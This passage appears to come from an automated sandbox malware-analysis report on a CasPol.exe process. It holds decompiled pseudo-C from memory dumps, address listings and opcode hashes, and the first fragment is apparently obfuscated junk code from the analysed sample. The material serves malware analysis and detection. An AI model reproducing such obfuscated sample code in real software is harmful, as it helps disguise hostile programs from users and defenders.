				_pop( *0xe1d49003);
				__ecx = __ecx - 1;
				asm("adc edx, [0xe04c91cc]");
				 *0xcc721d62 & 0x733cbcda = 0x733cbcda -  *0x7d7d1517;
				asm("ror dword [0xcbc195f4], 0xdd");
				asm("adc ah, 0x34");
				__eflags = __eax -  *0x8e331535;
				 *0xb178d83a = __bh;
				__eflags = __ebx & 0xf60f1e05;
				__esp = __esp + 1;
				asm("ror dword [0x16738f0e], 0x37");
				__bl = __bl ^ 0x00000084;
				__eax = __eax - 1;
				_pop( *0x791f5cf1);
				__eax = __eax - 1;
				__ecx =  *0x9d4f7239;
				asm("rol dword [0x4e3cbb67], 0xcc");
				__edi = __edi -  *0x8e138192;
				__eflags =  *0xc04b858d & __ecx;
				asm("sbb al, 0xe3");
				 *0xc43a02b8 =  *0xc43a02b8 &  *0x122a067c * 0x00005fed;
				asm("rol byte [0xd0ae5420], 0xa2");
				__esi =  *0x270e546b * 0xfdd6;
				__esi =  *0x270e546b * 0xfdd6 - 1;
				asm("stosb");
				__eflags = __ecx -  *0xa9d925da;
				_pop( *0xb864e79e);
				asm("ror byte [0xb2ca11b1], 0x61");
				asm("sbb edi, 0xd93e5c36");
				__eflags =  *0x5b29550b - __ecx;
				 *0x91d4c3cf =  *0x91d4c3cf & 0x733cbcda;
				__edx = __edx ^  *0x1907009e;
				asm("rcr byte [0x2ee1e1e1], 0xff");
				asm("adc eax, [0x27d53933]");
				_push(__esp);
				__eflags = __esi -  *0xc7adc627;
				if(__esi <  *0xc7adc627) {
					goto L1;
				}
				__eflags = __esi - 0x1a703472;
				asm("scasb");
				__ebx = __ebx +  *0x52f3898;
				 *0x29d0e361 =  *0x29d0e361 << 0xac;
				__eflags =  *0x29d0e361;
				return __eax;
			}










                                                                0x00421b68
                                                                0x00421b68
                                                                0x00421b68
                                                                0x00421b68
                                                                0x00421b68
                                                                0x00421b6d
                                                                0x00421b74
                                                                0x00421b7a
                                                                0x00421b80
                                                                0x00421b86
                                                                0x00421b8c
                                                                0x00421b92
                                                                0x00421b9f
                                                                0x00421ba0
                                                                0x00421bab
                                                                0x0042177d
                                                                0x0042177d
                                                                0x00421783
                                                                0x00421789
                                                                0x004217a2
                                                                0x004217a5
                                                                0x004217ab
                                                                0x004217b2
                                                                0x004217b8
                                                                0x004217b9
                                                                0x004217c5
                                                                0x004217c8
                                                                0x004217cf
                                                                0x004217d6
                                                                0x004217dc
                                                                0x004217e9
                                                                0x004217f9
                                                                0x004217fa
                                                                0x004217fb
                                                                0x00421801
                                                                0x00421808
                                                                0x0042180e
                                                                0x00421814
                                                                0x00000000
                                                                0x00421814
                                                                0x00421bb1
                                                                0x00421bb7
                                                                0x00421bbd
                                                                0x00421bc4
                                                                0x00421bc5
                                                                0x00421bcb
                                                                0x00421bd1
                                                                0x00000000
                                                                0x00000000
                                                                0x00421bd7
                                                                0x00421bdd
                                                                0x00421bde
                                                                0x00421bee
                                                                0x00421bf5
                                                                0x00421bfb
                                                                0x00421c02
                                                                0x00421c03
                                                                0x00421c0f
                                                                0x00421c15
                                                                0x00421c16
                                                                0x00421c17
                                                                0x00421c1d
                                                                0x00421c24
                                                                0x00421c2b
                                                                0x00421c32
                                                                0x00421c38
                                                                0x00421c3e
                                                                0x00421c43
                                                                0x00421c49
                                                                0x00421c4a
                                                                0x00421c4b
                                                                0x00421c58
                                                                0x00421c5e
                                                                0x00421c65
                                                                0x00421c6b
                                                                0x00000000
                                                                0x00000000
                                                                0x00421c71
                                                                0x00421c7b
                                                                0x00421c85
                                                                0x00421c8b
                                                                0x00421c97
                                                                0x00421c9d
                                                                0x00421ca4
                                                                0x00421ca4
                                                                0x00421caf
                                                                0x00421cb0
                                                                0x00000000
                                                                0x00000000
                                                                0x00421cb6
                                                                0x00421cbc
                                                                0x00421cc2
                                                                0x00421cc8
                                                                0x00421cce
                                                                0x00000000
                                                                0x00000000
                                                                0x00421cd4
                                                                0x00421cdb
                                                                0x00421ce1
                                                                0x00421ce7
                                                                0x00421cf0
                                                                0x00421cf6
                                                                0x00421d02
                                                                0x00421d08
                                                                0x00421d08
                                                                0x00421d0f
                                                                0x00000000
                                                                0x00000000
                                                                0x00421d15
                                                                0x00421d1b
                                                                0x00421d1b
                                                                0x00421d1c
                                                                0x00421d1d
                                                                0x00000000
                                                                0x00000000
                                                                0x00421d23
                                                                0x00421d2f
                                                                0x00421d35
                                                                0x00421d36
                                                                0x00421d3c
                                                                0x00421d42
                                                                0x00421d48
                                                                0x00421d4e
                                                                0x00421d51
                                                                0x00421d57
                                                                0x00421d5a
                                                                0x00000000
                                                                0x00000000
                                                                0x00421d60
                                                                0x00421d60
                                                                0x00421d66
                                                                0x00000000
                                                                0x00000000
                                                                0x00421d6c
                                                                0x00421d72
                                                                0x00421d78
                                                                0x00421d7f
                                                                0x00421d86
                                                                0x00421d8c
                                                                0x00421d92
                                                                0x00421d98
                                                                0x00421d9e
                                                                0x00421daa
                                                                0x00421db1
                                                                0x00421db8
                                                                0x00421dbe
                                                                0x00421dc1
                                                                0x00421dc7
                                                                0x00421dcd
                                                                0x00421dd3
                                                                0x00421dd6
                                                                0x00421ddc
                                                                0x00421de2
                                                                0x00421de8
                                                                0x00421dea
                                                                0x00421df4
                                                                0x00421dfa
                                                                0x00421dfa
                                                                0x00421e00
                                                                0x00000000
                                                                0x00000000
                                                                0x00421e06
                                                                0x00421e0c
                                                                0x00421e12
                                                                0x00421e12
                                                                0x00421e12
                                                                0x00421e18
                                                                0x00421e1e
                                                                0x00421e24
                                                                0x00421e2a
                                                                0x00421e31
                                                                0x00421e37
                                                                0x00421e3d
                                                                0x00421e40
                                                                0x00421e47
                                                                0x00421e4d
                                                                0x00421e53
                                                                0x00421e5a
                                                                0x00421e5d
                                                                0x00421e5e
                                                                0x00421e64
                                                                0x00421e64
                                                                0x00421e6a
                                                                0x00421e71
                                                                0x00000000
                                                                0x00000000
                                                                0x00421e77
                                                                0x00421e7d
                                                                0x00421e84
                                                                0x00421e8a
                                                                0x00421e8d
                                                                0x00421e93
                                                                0x00421e9d
                                                                0x00421e9d
                                                                0x00421e9e
                                                                0x00000000
                                                                0x00000000
                                                                0x00421ea4
                                                                0x00421ea4
                                                                0x00421eaa
                                                                0x00421eb0
                                                                0x00421eb0
                                                                0x00421eb0
                                                                0x00421eb6
                                                                0x00000000
                                                                0x00000000
                                                                0x00421ebc
                                                                0x00421ec6
                                                                0x00421ec7
                                                                0x00421ecd
                                                                0x00421ece
                                                                0x00421eda
                                                                0x00421ee0
                                                                0x00421ee7
                                                                0x00421eea
                                                                0x00421ef0
                                                                0x00421ef6
                                                                0x00421efc
                                                                0x00421efd
                                                                0x00421f04
                                                                0x00421f07
                                                                0x00421f08
                                                                0x00421f0e
                                                                0x00421f15
                                                                0x00421f16
                                                                0x00421f1d
                                                                0x00421f23
                                                                0x00421f29
                                                                0x00421f2b
                                                                0x00421f31
                                                                0x00421f38
                                                                0x00421f42
                                                                0x00421f43
                                                                0x00421f44
                                                                0x00421f4a
                                                                0x00421f50
                                                                0x00421f57
                                                                0x00421f5d
                                                                0x00421f63
                                                                0x00421f69
                                                                0x00421f6f
                                                                0x00421f76
                                                                0x00421f7c
                                                                0x00421f7d
                                                                0x00421f83
                                                                0x00000000
                                                                0x00000000
                                                                0x00421f89
                                                                0x00421f8f
                                                                0x00421f90
                                                                0x00421f96
                                                                0x00421f96
                                                                0x00421f9d

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312223010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_400000_CasPol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a0ccbbb0ae813c27ea6eb076c657408417a897c76648a9eb78513fc97f73f30d
                                                                • Instruction ID: 1ff6dee43313cb04a8917b1ecbcd4ff0723e68af32a410c60452719ce5854dd7
                                                                • Opcode Fuzzy Hash: a0ccbbb0ae813c27ea6eb076c657408417a897c76648a9eb78513fc97f73f30d
                                                                • Instruction Fuzzy Hash: F7C16572A09791CFE702DF35D88A7513BB1F792324F58428ED8A1631E2D338152ADF89
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 016F1D55 Relevance: .2, Instructions: 226COMMONCrypto
                                                                Download Yara Rule
                                                                C-Code - Quality: 90%
                                                                			E016F1D55(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t97;
				signed int _t101;
				signed int _t112;
				unsigned int _t113;
				signed int _t121;
				signed int _t128;
				signed int _t130;
				signed char _t135;
				intOrPtr _t136;
				intOrPtr _t137;
				signed int _t139;
				signed int _t141;
				signed int _t143;
				signed int _t144;
				signed int _t149;
				signed int _t150;
				void* _t154;
				signed int* _t161;
				signed int _t163;
				signed int _t164;
				void* _t167;
				intOrPtr _t171;
				signed int _t172;
				void* _t175;
				signed int* _t178;
				signed int _t179;
				signed int _t180;
				signed char _t181;
				signed char _t183;
				signed int _t187;
				signed int _t189;
				signed int _t190;
				void* _t191;
				void* _t197;

				_t137 = __ecx;
				_push(0x64);
				_push(0x1701070);
				E0167D08C(__ebx, __edi, __esi);
				 *(_t191 - 0x24) = __edx;
				 *((intOrPtr*)(_t191 - 0x20)) = __ecx;
				 *((intOrPtr*)(_t191 - 0x38)) = __ecx;
				_t135 = 0;
				 *(_t191 - 0x40) = 0;
				_t171 =  *((intOrPtr*)(__ecx + 0xc));
				_t189 =  *(__ecx + 8);
				 *(_t191 - 0x28) = _t189;
				 *((intOrPtr*)(_t191 - 0x3c)) = _t171;
				 *(_t191 - 0x50) = _t189;
				_t187 = __edx << 0xf;
				 *(_t191 - 0x4c) = _t187;
				_t190 = 0x8000;
				 *(_t191 - 0x34) = 0x8000;
				_t172 = _t171 - _t187;
				if(_t172 <= 0x8000) {
					_t190 = _t172;
					 *(_t191 - 0x34) = _t172;
				}
				 *(_t191 - 0x68) = _t135;
				 *(_t191 - 0x64) = _t135;
				L3:
				while(1) {
					if( *(_t191 + 8) != 0) {
						L22:
						 *(_t191 + 8) = _t135;
						E016F337F(_t137, 1, _t191 - 0x74);
						_t97 =  *((intOrPtr*)(_t191 - 0x20));
						_t175 =  *(_t97 + 0x14);
						 *(_t191 - 0x58) = _t175;
						_t139 = _t97 + 0x14;
						 *(_t191 - 0x44) = _t139;
						_t197 = _t175 - 0xffffffff;
						if(_t197 == 0) {
							 *_t139 =  *(_t191 - 0x24);
							E016F33B6(_t191 - 0x74);
							 *(_t191 - 0x40) = 1;
							_t60 =  *((intOrPtr*)(_t191 - 0x38)) + 4; // 0x40c03332
							_t101 =  *_t60;
							_t141 =  *(_t191 - 0x24);
							asm("bt [eax], ecx");
							_t103 = (_t101 & 0xffffff00 | __eflags > 0x00000000) & 0x000000ff;
							if(__eflags == 0) {
								goto L41;
							} else {
								_t103 = _t187 - 1 + _t190;
								__eflags = _t187 - 1 + _t190 -  *((intOrPtr*)(_t191 - 0x3c));
								if(_t187 - 1 + _t190 >=  *((intOrPtr*)(_t191 - 0x3c))) {
									goto L41;
								} else {
									__eflags = _t190 - 1;
									if(__eflags > 0) {
										_t143 =  *(_t191 - 0x28);
										_t178 = _t143 + (_t187 >> 5) * 4;
										_t144 = _t143 + (_t187 - 1 + _t190 >> 5) * 4;
										 *(_t191 - 0x50) = _t144;
										_t112 =  *_t178;
										 *(_t191 - 0x54) = _t112;
										_t113 = _t112 | 0xffffffff;
										__eflags = _t178 - _t144;
										if(_t178 != _t144) {
											_t103 = _t113 << _t187;
											__eflags =  *_t178 & _t103;
											if(( *_t178 & _t103) != 0) {
												goto L41;
											} else {
												_t103 =  *(_t191 - 0x50);
												while(1) {
													_t178 =  &(_t178[1]);
													__eflags = _t178 - _t103;
													if(_t178 == _t103) {
														break;
													}
													__eflags =  *_t178 - _t135;
													if( *_t178 != _t135) {
														goto L41;
													} else {
														continue;
													}
													goto L42;
												}
												_t103 = (_t103 | 0xffffffff) >>  !(_t187 - 1 + _t190);
												__eflags = _t103;
												_t149 =  *_t178;
												goto L38;
											}
										} else {
											_t154 = 0x20;
											_t103 = _t113 >> _t154 - _t190 << _t187;
											_t149 =  *(_t191 - 0x54);
											L38:
											_t150 = _t149 & _t103;
											__eflags = _t150;
											asm("sbb cl, cl");
											_t135 =  ~_t150 + 1;
											_t141 =  *(_t191 - 0x24);
											goto L39;
										}
									} else {
										if(__eflags != 0) {
											goto L41;
										} else {
											_t103 =  *(_t191 - 0x28);
											asm("bt [eax], edi");
											if(__eflags >= 0) {
												L40:
												_t136 =  *((intOrPtr*)(_t191 - 0x20));
												asm("lock btr [eax], ecx");
												 *((intOrPtr*)(_t191 - 0x60)) = (_t141 << 0xc) +  *((intOrPtr*)(_t136 + 8));
												 *((intOrPtr*)(_t191 - 0x5c)) = 0x1000;
												_push(0x4000);
												_push(_t191 - 0x5c);
												_push(_t191 - 0x60);
												_push(0xffffffff);
												_t103 = E016696E0();
											} else {
												L39:
												__eflags = _t135;
												if(_t135 == 0) {
													goto L41;
												} else {
													goto L40;
												}
											}
										}
									}
								}
							}
						} else {
							E016F33B6(_t191 - 0x74);
							_t172 = _t191 - 0x58;
							E0165E18B( *(_t191 - 0x44), _t172, 4, _t135,  *0x1715880);
							_t51 =  *((intOrPtr*)(_t191 - 0x38)) + 4; // 0x40c03332
							_t121 =  *_t51;
							asm("bt [eax], ecx");
							_t103 = (_t121 & 0xffffff00 | _t197 > 0x00000000) & 0x000000ff;
							if(((_t121 & 0xffffff00 | _t197 > 0x00000000) & 0x000000ff) == 0) {
								goto L41;
							} else {
								_t137 =  *((intOrPtr*)(_t191 - 0x20));
								continue;
							}
						}
					} else {
						 *(_t191 - 4) = _t135;
						_t103 = _t187 - 1 + _t190;
						 *(_t191 - 0x30) = _t103;
						if(_t103 <  *((intOrPtr*)(_t191 - 0x3c))) {
							__eflags = _t190 - 1;
							if(__eflags > 0) {
								_t179 =  *(_t191 - 0x28);
								_t161 = _t179 + (_t187 >> 5) * 4;
								 *(_t191 - 0x2c) = _t161;
								_t128 = _t179 + ( *(_t191 - 0x30) >> 5) * 4;
								 *(_t191 - 0x44) = _t128;
								_t180 =  *_t161;
								__eflags = _t161 - _t128;
								if(_t161 != _t128) {
									_t103 = (_t128 | 0xffffffff) << _t187;
									__eflags = _t103 & _t180;
									if((_t103 & _t180) != 0) {
										goto L5;
									} else {
										_t130 =  *(_t191 - 0x2c);
										_t164 =  *(_t191 - 0x44);
										while(1) {
											_t130 = _t130 + 4;
											 *(_t191 - 0x2c) = _t130;
											_t180 =  *_t130;
											__eflags = _t130 - _t164;
											if(_t130 == _t164) {
												break;
											}
											__eflags = _t180;
											if(_t180 == 0) {
												continue;
											} else {
												goto L5;
											}
											goto L19;
										}
										_t103 = (_t130 | 0xffffffff) >>  !( *(_t191 - 0x30));
										__eflags = _t103;
										goto L17;
									}
								} else {
									_t167 = 0x20;
									_t103 = (_t128 | 0xffffffff) >> _t167 - _t190 << _t187;
									L17:
									_t183 =  ~(_t180 & _t103);
									asm("sbb dl, dl");
									goto L18;
								}
							} else {
								if(__eflags != 0) {
									goto L5;
								} else {
									_t103 =  *(_t191 - 0x28);
									asm("bt [eax], edi");
									_t183 =  ~(_t172 & 0xffffff00 | __eflags > 0x00000000);
									asm("sbb dl, dl");
									L18:
									_t181 = _t183 + 1;
									__eflags = _t181;
								}
							}
						} else {
							L5:
							_t181 = _t135;
						}
						L19:
						 *(_t191 - 0x19) = _t181;
						_t163 = _t181 & 0x000000ff;
						 *(_t191 - 0x48) = _t163;
						 *(_t191 - 4) = 0xfffffffe;
						if(_t163 == 0) {
							L41:
							_t136 =  *((intOrPtr*)(_t191 - 0x20));
						} else {
							_t137 =  *((intOrPtr*)(_t191 - 0x20));
							goto L22;
						}
					}
					L42:
					__eflags =  *(_t191 - 0x40);
					if( *(_t191 - 0x40) != 0) {
						_t91 = _t136 + 0x14; // 0x14
						_t142 = _t91;
						 *_t91 = 0xffffffff;
						__eflags = 0;
						asm("lock or [eax], edx");
						_t103 = E0165DFDF(_t91, 1, _t142);
					}
					return E0167D0D1(_t103);
				}
			}





































                                                                0x016f1d55
                                                                0x016f1d55
                                                                0x016f1d57
                                                                0x016f1d5c
                                                                0x016f1d63
                                                                0x016f1d66
                                                                0x016f1d69
                                                                0x016f1d6c
                                                                0x016f1d6e
                                                                0x016f1d71
                                                                0x016f1d74
                                                                0x016f1d77
                                                                0x016f1d7a
                                                                0x016f1d7d
                                                                0x016f1d82
                                                                0x016f1d85
                                                                0x016f1d88
                                                                0x016f1d8d
                                                                0x016f1d90
                                                                0x016f1d94
                                                                0x016f1d96
                                                                0x016f1d98
                                                                0x016f1d98
                                                                0x016f1d9b
                                                                0x016f1d9e
                                                                0x00000000
                                                                0x016f1da1
                                                                0x016f1da5
                                                                0x016f1e78
                                                                0x016f1e78
                                                                0x016f1e82
                                                                0x016f1e87
                                                                0x016f1e8a
                                                                0x016f1e8d
                                                                0x016f1e92
                                                                0x016f1e95
                                                                0x016f1e98
                                                                0x016f1e9b
                                                                0x016f1ede
                                                                0x016f1ee3
                                                                0x016f1ee8
                                                                0x016f1ef2
                                                                0x016f1ef2
                                                                0x016f1ef5
                                                                0x016f1ef8
                                                                0x016f1efe
                                                                0x016f1f03
                                                                0x00000000
                                                                0x016f1f09
                                                                0x016f1f0c
                                                                0x016f1f0e
                                                                0x016f1f11
                                                                0x00000000
                                                                0x016f1f17
                                                                0x016f1f17
                                                                0x016f1f1a
                                                                0x016f1f31
                                                                0x016f1f34
                                                                0x016f1f3f
                                                                0x016f1f42
                                                                0x016f1f45
                                                                0x016f1f47
                                                                0x016f1f4a
                                                                0x016f1f4d
                                                                0x016f1f4f
                                                                0x016f1f63
                                                                0x016f1f65
                                                                0x016f1f67
                                                                0x00000000
                                                                0x016f1f69
                                                                0x016f1f69
                                                                0x016f1f72
                                                                0x016f1f72
                                                                0x016f1f75
                                                                0x016f1f77
                                                                0x00000000
                                                                0x00000000
                                                                0x016f1f6e
                                                                0x016f1f70
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x016f1f70
                                                                0x016f1f83
                                                                0x016f1f83
                                                                0x016f1f85
                                                                0x00000000
                                                                0x016f1f85
                                                                0x016f1f51
                                                                0x016f1f53
                                                                0x016f1f5a
                                                                0x016f1f5c
                                                                0x016f1f87
                                                                0x016f1f87
                                                                0x016f1f87
                                                                0x016f1f8b
                                                                0x016f1f8d
                                                                0x016f1f90
                                                                0x00000000
                                                                0x016f1f90
                                                                0x016f1f1c
                                                                0x016f1f1c
                                                                0x00000000
                                                                0x016f1f22
                                                                0x016f1f22
                                                                0x016f1f25
                                                                0x016f1f28
                                                                0x016f1f97
                                                                0x016f1f97
                                                                0x016f1f9d
                                                                0x016f1fa7
                                                                0x016f1faa
                                                                0x016f1fb1
                                                                0x016f1fb9
                                                                0x016f1fbd
                                                                0x016f1fbe
                                                                0x016f1fc0
                                                                0x016f1f2a
                                                                0x016f1f93
                                                                0x016f1f93
                                                                0x016f1f95
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x016f1f95
                                                                0x016f1f28
                                                                0x016f1f1c
                                                                0x016f1f1a
                                                                0x016f1f11
                                                                0x016f1e9d
                                                                0x016f1ea0
                                                                0x016f1eae
                                                                0x016f1eb4
                                                                0x016f1ebc
                                                                0x016f1ebc
                                                                0x016f1ec2
                                                                0x016f1ec8
                                                                0x016f1ecd
                                                                0x00000000
                                                                0x016f1ed3
                                                                0x016f1ed3
                                                                0x00000000
                                                                0x016f1ed3
                                                                0x016f1ecd
                                                                0x016f1dab
                                                                0x016f1dab
                                                                0x016f1db1
                                                                0x016f1db3
                                                                0x016f1db9
                                                                0x016f1dbf
                                                                0x016f1dc2
                                                                0x016f1dda
                                                                0x016f1ddd
                                                                0x016f1de0
                                                                0x016f1de9
                                                                0x016f1dec
                                                                0x016f1def
                                                                0x016f1df1
                                                                0x016f1df3
                                                                0x016f1e0a
                                                                0x016f1e0c
                                                                0x016f1e0e
                                                                0x00000000
                                                                0x016f1e10
                                                                0x016f1e10
                                                                0x016f1e13
                                                                0x016f1e16
                                                                0x016f1e16
                                                                0x016f1e19
                                                                0x016f1e1c
                                                                0x016f1e1e
                                                                0x016f1e20
                                                                0x00000000
                                                                0x00000000
                                                                0x016f1e22
                                                                0x016f1e24
                                                                0x00000000
                                                                0x016f1e26
                                                                0x00000000
                                                                0x016f1e26
                                                                0x00000000
                                                                0x016f1e24
                                                                0x016f1e30
                                                                0x016f1e30
                                                                0x00000000
                                                                0x016f1e30
                                                                0x016f1df5
                                                                0x016f1df7
                                                                0x016f1e01
                                                                0x016f1e32
                                                                0x016f1e34
                                                                0x016f1e36
                                                                0x00000000
                                                                0x016f1e36
                                                                0x016f1dc4
                                                                0x016f1dc4
                                                                0x00000000
                                                                0x016f1dc6
                                                                0x016f1dc6
                                                                0x016f1dc9
                                                                0x016f1dcf
                                                                0x016f1dd1
                                                                0x016f1e38
                                                                0x016f1e38
                                                                0x016f1e38
                                                                0x016f1e38
                                                                0x016f1dc4
                                                                0x016f1dbb
                                                                0x016f1dbb
                                                                0x016f1dbb
                                                                0x016f1dbb
                                                                0x016f1e3a
                                                                0x016f1e3a
                                                                0x016f1e3d
                                                                0x016f1e40
                                                                0x016f1e43
                                                                0x016f1e6f
                                                                0x016f1fc7
                                                                0x016f1fc7
                                                                0x016f1e75
                                                                0x016f1e75
                                                                0x00000000
                                                                0x016f1e75
                                                                0x016f1e6f
                                                                0x016f1fca
                                                                0x016f1fca
                                                                0x016f1fce
                                                                0x016f1fd0
                                                                0x016f1fd0
                                                                0x016f1fd3
                                                                0x016f1fd9
                                                                0x016f1fde
                                                                0x016f1fe4
                                                                0x016f1fe4
                                                                0x016f1fee
                                                                0x016f1fee

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 4293f3f1a4a701a0cf1ce622960aaf7ed6d0c8d033dd43d38277f9a81047316a
                                                                • Instruction ID: bbbb6d936f4dc4f430b7000addc4136468e3fc8ef567c92ddaeda59b6d5ee792
                                                                • Opcode Fuzzy Hash: 4293f3f1a4a701a0cf1ce622960aaf7ed6d0c8d033dd43d38277f9a81047316a
                                                                • Instruction Fuzzy Hash: 07816B31E01219CFDF18DFA8C8809ECBBB2BF5A354B14422DE612AB3D5DB319946CB50
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0162C600 Relevance: .2, Instructions: 225COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 67%
                                                                			E0162C600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				char _v1036;
				signed int _v1040;
				char _v1048;
				signed int _v1052;
				signed char _v1056;
				void* _v1058;
				char _v1060;
				signed int _v1064;
				void* _v1068;
				intOrPtr _v1072;
				void* _v1084;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t70;
				intOrPtr _t72;
				signed int _t74;
				intOrPtr _t77;
				signed int _t78;
				signed int _t81;
				void* _t101;
				signed int _t102;
				signed int _t107;
				signed int _t109;
				signed int _t110;
				signed char _t111;
				signed int _t112;
				signed int _t113;
				signed int _t114;
				intOrPtr _t116;
				void* _t117;
				char _t118;
				void* _t120;
				char _t121;
				signed int _t122;
				signed int _t123;
				signed int _t125;

				_t125 = (_t123 & 0xfffffff8) - 0x424;
				_v8 =  *0x171d360 ^ _t125;
				_t116 = _a4;
				_v1056 = _a16;
				_v1040 = _a24;
				if(E01636D30( &_v1048, _a8) < 0) {
					L4:
					_pop(_t117);
					_pop(_t120);
					_pop(_t101);
					return E0166B640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
				}
				_t70 = _a20;
				if(_t70 >= 0x3f4) {
					_t121 = _t70 + 0xc;
					L19:
					_t107 =  *( *[fs:0x30] + 0x18);
					__eflags = _t107;
					if(_t107 == 0) {
						L60:
						_t68 = 0xc0000017;
						goto L4;
					}
					_t72 =  *0x1717b9c; // 0x0
					_t74 = L01644620(_t107, _t107, _t72 + 0x180000, _t121);
					_v1064 = _t74;
					__eflags = _t74;
					if(_t74 == 0) {
						goto L60;
					}
					_t102 = _t74;
					_push( &_v1060);
					_push(_t121);
					_push(_t74);
					_push(2);
					_push( &_v1048);
					_push(_t116);
					_t122 = E01669650();
					__eflags = _t122;
					if(_t122 >= 0) {
						L7:
						_t114 = _a12;
						__eflags = _t114;
						if(_t114 != 0) {
							_t77 = _a20;
							L26:
							_t109 =  *(_t102 + 4);
							__eflags = _t109 - 3;
							if(_t109 == 3) {
								L55:
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									L59:
									_t122 = 0xc0000024;
									L15:
									_t78 = _v1052;
									__eflags = _t78;
									if(_t78 != 0) {
										L016477F0( *( *[fs:0x30] + 0x18), 0, _t78);
									}
									_t68 = _t122;
									goto L4;
								}
								_t110 = _v1056;
								_t118 =  *((intOrPtr*)(_t102 + 8));
								_v1060 = _t118;
								__eflags = _t110;
								if(_t110 == 0) {
									L10:
									_t122 = 0x80000005;
									L11:
									_t81 = _v1040;
									__eflags = _t81;
									if(_t81 == 0) {
										goto L15;
									}
									__eflags = _t122;
									if(_t122 >= 0) {
										L14:
										 *_t81 = _t118;
										goto L15;
									}
									__eflags = _t122 - 0x80000005;
									if(_t122 != 0x80000005) {
										goto L15;
									}
									goto L14;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
									goto L10;
								}
								_push( *((intOrPtr*)(_t102 + 8)));
								_t59 = _t102 + 0xc; // 0xc
								_push(_t110);
								L54:
								E0166F3E0();
								_t125 = _t125 + 0xc;
								goto L11;
							}
							__eflags = _t109 - 7;
							if(_t109 == 7) {
								goto L55;
							}
							_t118 = 4;
							__eflags = _t109 - _t118;
							if(_t109 != _t118) {
								__eflags = _t109 - 0xb;
								if(_t109 != 0xb) {
									__eflags = _t109 - 1;
									if(_t109 == 1) {
										__eflags = _t114 - _t118;
										if(_t114 != _t118) {
											_t118 =  *((intOrPtr*)(_t102 + 8));
											_v1060 = _t118;
											__eflags = _t118 - _t77;
											if(_t118 > _t77) {
												goto L10;
											}
											_push(_t118);
											_t56 = _t102 + 0xc; // 0xc
											_push(_v1056);
											goto L54;
										}
										__eflags = _t77 - _t118;
										if(_t77 != _t118) {
											L34:
											_t122 = 0xc0000004;
											goto L15;
										}
										_t111 = _v1056;
										__eflags = _t111 & 0x00000003;
										if((_t111 & 0x00000003) == 0) {
											_v1060 = _t118;
											__eflags = _t111;
											if(__eflags == 0) {
												goto L10;
											}
											_t42 = _t102 + 0xc; // 0xc
											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
											_v1048 =  *((intOrPtr*)(_t102 + 8));
											_push(_t111);
											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
											_push(0);
											_push( &_v1048);
											_t122 = E016613C0(_t102, _t118, _t122, __eflags);
											L44:
											_t118 = _v1072;
											goto L11;
										}
										_t122 = 0x80000002;
										goto L15;
									}
									_t122 = 0xc0000024;
									goto L44;
								}
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									goto L59;
								}
								_t118 = 8;
								__eflags = _t77 - _t118;
								if(_t77 != _t118) {
									goto L34;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
									goto L34;
								}
								_t112 = _v1056;
								_v1060 = _t118;
								__eflags = _t112;
								if(_t112 == 0) {
									goto L10;
								}
								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
								goto L11;
							}
							__eflags = _t114 - _t118;
							if(_t114 != _t118) {
								goto L59;
							}
							__eflags = _t77 - _t118;
							if(_t77 != _t118) {
								goto L34;
							}
							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
								goto L34;
							}
							_t113 = _v1056;
							_v1060 = _t118;
							__eflags = _t113;
							if(_t113 == 0) {
								goto L10;
							}
							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
							goto L11;
						}
						_t118 =  *((intOrPtr*)(_t102 + 8));
						__eflags = _t118 - _a20;
						if(_t118 <= _a20) {
							_t114 =  *(_t102 + 4);
							_t77 = _t118;
							goto L26;
						}
						_v1060 = _t118;
						goto L10;
					}
					__eflags = _t122 - 0x80000005;
					if(_t122 != 0x80000005) {
						goto L15;
					}
					L016477F0( *( *[fs:0x30] + 0x18), 0, _t102);
					L18:
					_t121 = _v1060;
					goto L19;
				}
				_push( &_v1060);
				_push(0x400);
				_t102 =  &_v1036;
				_push(_t102);
				_push(2);
				_push( &_v1048);
				_push(_t116);
				_t122 = E01669650();
				if(_t122 >= 0) {
					__eflags = 0;
					_v1052 = 0;
					goto L7;
				}
				if(_t122 == 0x80000005) {
					goto L18;
				}
				goto L4;
			}










































                                                                0x0162c608
                                                                0x0162c615
                                                                0x0162c625
                                                                0x0162c62d
                                                                0x0162c635
                                                                0x0162c640
                                                                0x0162c680
                                                                0x0162c687
                                                                0x0162c688
